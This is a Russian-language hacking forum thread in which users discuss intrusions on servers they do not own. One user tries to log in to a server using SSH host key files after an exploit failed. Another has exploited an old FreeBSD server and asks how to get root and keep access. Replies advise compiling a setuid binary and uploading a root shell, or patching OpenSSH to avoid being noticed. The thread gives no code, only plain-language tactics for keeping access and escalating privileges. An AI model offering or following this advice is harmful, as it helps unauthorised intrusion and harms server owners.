ssh_host_dsa_key.pub

ssh_host_dsa_key

ssh_host_rsa_key

ssh_host_rsa_key.pub
то можно через
telnet-ssh
можно попробовать через
LDAP


Каким образом? на одном серваке есть доступ к этим файлам...пытался сплойтом пробить не поддался, может хоть так получится

sevenup said:
Каким образом? на одном серваке есть доступ к этим файлам...пытался сплойтом пробить не поддался, может хоть так получится


инфа по rsa_keyтут (http://forum.vingrad.ru/forum/topic-320519/kw-rsa-ssh.html)

по LDAP тут (http://www.opennet.ru/base/net/ldap_auth2.txt.html)

vasykas said:
Я думаю если есть доступ к:
ssh_host_dsa_key.pub

ssh_host_dsa_key

ssh_host_rsa_key

ssh_host_rsa_key.pub
то можно через
telnet-ssh
можно попробовать через
LDAP



не. доступ есть только к ssh_host_rsa_key.pub и ssh_host_dsa_key.pub (((((((((((((((.

vasykas said:
инфа по rsa_key
тут (http://forum.vingrad.ru/forum/topic-320519/kw-rsa-ssh.html)
по LDAP
тут (http://www.opennet.ru/base/net/ldap_auth2.txt.html)


И как мне это поможет ? я спрашивал конкретно как подключится через telnet при наличии этих ключей ?

sevenup said:
И как мне это поможет ? я спрашивал конкретно как подключится через telnet при наличии этих ключей ?


у тебя че рук нет в гугле покапаться

http://wiki.hasanov.ru/ubuntu/ssh-suth-no-pass

Доброго времени суток, уважаемые форумчане, как лучше всего закрепиться в FreeBSD? Дело в том, что с этой системой никогда дел не имел, а тут попался сервак старый))) сплоитом пробился с первого раза, а вот как сделать рутовый шелл? Какие отличия от linux систем в этом плане?

z0mbyak said:
Доброго времени суток, уважаемые форумчане, как лучше всего закрепиться в FreeBSD? Дело в том, что с этой системой никогда дел не имел, а тут попался сервак старый))) сплоитом пробился с первого раза, а вот как сделать рутовый шелл? Какие отличия от linux систем в этом плане?


почти никаких отличий кажется, найди где установлено пхп интерпретатор (иногда команда php возвращает нот фаунд)

компилируй суидник, потом залей рутовый шелл и запусти под рутом

/showpost.php?p=2293082&postcount=1

/showpost.php?p=2642066&postcount=11

Konqi said:
почти никаких отличий кажется, найди где установлено пхп интерпретатор (иногда команда php возвращает нот фаунд)
компилируй суидник, потом залей рутовый шелл и запусти под рутом
/showpost.php?p=2293082&postcount=1
/showpost.php?p=2642066&postcount=11


Я думал закрепится, это не оставить суидник, а например пропатчить опенссш, суидник выкупится в течении дня-двух.

Expl0ited said:
Я думал закрепится, это не оставить суидник, а например пропатчить опенссш, суидник выкупится в течении дня-двух.


я думаю чтобы не было споров надо почитать:

http://www.freebsd.org/doc/ru_RU.KOI8-R/articles/explaining-bsd/compairing-bsd-and-linux.html